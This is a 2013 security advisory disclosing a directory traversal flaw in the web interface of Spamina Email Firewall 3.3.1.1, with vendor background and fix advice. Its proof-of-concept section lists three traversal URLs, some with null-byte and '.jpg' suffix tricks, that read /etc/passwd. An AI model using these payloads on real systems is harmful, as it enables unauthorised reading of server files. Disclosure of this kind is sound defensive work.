Vulnerability in the web application of Spamina email firewall.

Vulnerability Type: Directory Traversal

- Original release date: October 3th, 2013
- Last revised: December 9th, 2013
- Discovered by: Sisco Barrera - A2SECURE

Products and affected versions:
SPAMINA EMAIL FIREWALL 3.3.1.1 (maybe other versions also vulnerable)


Vulnerability Discovered by: Sisco Barrera - sisco.barrera@gmail.com  
Company: A2SECURE - España
A2Secure Website: http://www.a2secure.com
Vendor Website: http://www.spamina.com
Application Website: http://es.spamina.com/es/products.php?pob=CloudEmailFirewall


======================
Background
======================

Spamina is a global leader in offering innovative Cloud-based E-mail & Web security solutions. Our security solutions help organizations to instantly secure and manage their information while maintaining compliance and corporate policies. Spamina solutions include Cloud Email Firewall, Cloud Email Encryption & DLP, Cloud Email Archiving and Cloud Web Security to provide Web traffic filtering.



======================
Vulnerability Details
======================

A directory-traversal attack is based on the premise that web clients are limited to specific directories within the Windows files system. The initial directory access by web clients is known as the root directory on a web server. This root directory typically stores the home page usually known as Default or Index, as well as other HTML documents for the web server. The web server should allow users to access only these specific directories and subdirectories of root. However, a directory- traversal attack permits access to other directories within the file system. The encoded version of / (slash) in ../ directory traversal request (%2E%2E%2F) seems to be now fixed, after our previous alert.

Spamina should define access rights to private folders on the web server, implement a special characters filtering, apply patches and hotfixes.

======================
Proof of Concepts
======================

This URLs just show the directory traversal are this:

https://xxx.xxx.xxx.xxx/?action=showHome&language=../../../../../../../../../../etc/passwd%00.jpg

https://xxx.xxx.xxx.xxx/multiadmin/js/lib/?action=../../../../../../../../../../etc/passwd&language=de

https://xxx.xxx.xxx.xxx/index.php?action=userLogin&language=../../../../../../../../../../etc/passwd.jpg

======================
Credits/Author
======================

Sisco Barrera
a2secure.com

======================
Disclaimer
======================

All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore A2Secure shall not be liable for any direct or indirect damages that might be caused by using this information.